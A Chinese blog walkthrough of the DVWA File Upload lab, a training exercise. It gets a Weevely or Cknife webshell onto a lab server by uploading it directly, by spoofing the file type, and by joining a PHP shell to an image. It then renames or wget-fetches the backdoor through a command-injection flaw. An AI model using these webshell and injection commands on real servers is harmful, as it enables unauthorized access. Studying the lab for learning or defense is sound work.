【DVWA全攻略】DVWA File Upload实验

image.png

DVWA File Upload实验

正常功能

实现图片上传或者正常的附件上传到服务器

Low难度

代码分析

<?php
 if( isset( $_POST[ 'Upload' ] ) ) {
     // Where are we going to be writing to?
     $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
     $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
 ​
     // Can we move the file to the upload folder?
     if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
         // No
         $html .= '<pre>Your image was not uploaded.</pre>';
     }
     else {
         // Yes!
         $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
     }
 ​
 }
 ?>

服务器没有对上传文件做任何限制,因此这里可以直接上传webshell

使用Weevely制作webshell

除了使用简单的php一句话木马
还可以配合Weevely进行后门的生成

weevely generate FancyPig file_inclusion.php
image.png

上传该文件

image.png
image.png

使用Weevely连接服务器

使用weevely进行连接

weevely http://192.168.47.129/dvwa/hackable/uploads/file_inclusion.php FancyPig

这里已经以www用户身份连接到了服务器,可以输入shell命令

image.png

Medium难度

代码分析

<?php
 if( isset( $_POST[ 'Upload' ] ) ) {
     // Where are we going to be writing to?
     $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
     $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
 ​
     // File information
     $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
     $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
     $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
 ​
     // Is it an image?
     if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
         ( $uploaded_size < 100000 ) ) {
 ​
         // Can we move the file to the upload folder?
         if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
             // No
             $html .= '<pre>Your image was not uploaded.</pre>';
 ​
         }
 ​
         else {
 ​
             // Yes!
             $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
         }
     }
     else {
 ​
         // Invalid file
         $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
     }
 ​
 }
 ?>

从上述代码可以看到,该代码对上传文件的类型及大小做了相关限制,限制了mime类型必须是jpeg或者png,且大小不能超过100000B

修改文件类型

将之前Weevely生成的文件修改类型为png

image.png

然后上传时进行抓包,这里可以看到类型是png的

image.png

我们可以通过修改上面文件名称的.png.php进行上传

image.png

提示上传成功了

image.png

连接服务器

使用weevely进行连接

weevely http://192.168.47.129/dvwa/hackable/uploads/file_inclusion.php FancyPig

这里已经以www用户身份连接到了服务器,可以输入shell命令

image.png

High难度

代码分析

<?php
 ​
 if( isset( $_POST[ 'Upload' ] ) ) {
 ​
     // Where are we going to be writing to?
     $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
     $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
 ​
 ​
     // File information
     $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
     $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
     $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
     $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];
 ​
     // Is it an image?
     if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
         ( $uploaded_size < 100000 ) &&
         getimagesize( $uploaded_tmp ) ) {
 ​
         // Can we move the file to the upload folder?
         if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
             // No
             $html .= '<pre>Your image was not uploaded.</pre>';
         }
 ​
         else {
             // Yes!
             $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
         }
     }
     else {
         // Invalid file
         $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
     }
 }
 ?>

之前的Medium难度的代码有漏洞是因为使用 content-type 去判断文件类型,上述代码通过文件扩展名进行判断,这样就很难通过burpsuite上传php文件了。

这时候我们就需要借助DVWA里其他的漏洞,比方说借用Command Injection的漏洞进行文件名修改,将上传的文件后缀修改成.php

思路1:截取很小的图片进行合成然后使用Cknife连接

 

创建图片并合成

这里截取了一个很小很小的图片(小的跟一个像素块一样)

image.png

然后进行合成

image.png

上传

image.png

利用Command Injection修改文件类型

ping 127.0.0.1 |mv ../../hackable/uploads/test.png ../../hackable/uploads/test.php
image.png

然后用Cknife连接,进行连接,发现能够连接

image.png

思路2:截取很小的图片进行合成然后使用Weevely连接

创建图片并合成

weevely generate FancyPig test.php
 cat screenshot.png test.php >> test2.png
image.png

上传成功

image.png

利用Command Injection修改文件类型

ping 127.0.0.1 |mv ../../hackable/uploads/test2.png ../../hackable/uploads/test2.php
image.png

使用Weevely连接

weevely http://192.168.47.129/dvwa/hackable/uploads/test2.php FancyPig
image.png

思路3:通过Command Injection上传后门文件

image.png

下载test.txt文件

ping 127.0.0.1 |wget http://192.168.47.128/test/test.txt
image.png

验证发现已经成功上传

image.png

test.txt文件修改为test.php文件

ping 127.0.0.1 |mv test.txt test.php
image.png

验证发现已经成功修改

image.png

使用Weevely进行连接

weevely http://192.168.47.129/dvwa/vulnerabilities/exec/test.php FancyPig
image.png
© 版权声明
THE END
喜欢就支持一下吧
点赞615赞赏
分享
评论 共3条

请登录后发表评论

    • FancyPig的头像-FancyPig's blog
      猪猪侠
      0
    • FancyPig的头像-FancyPig's blog
      猪猪侠
      0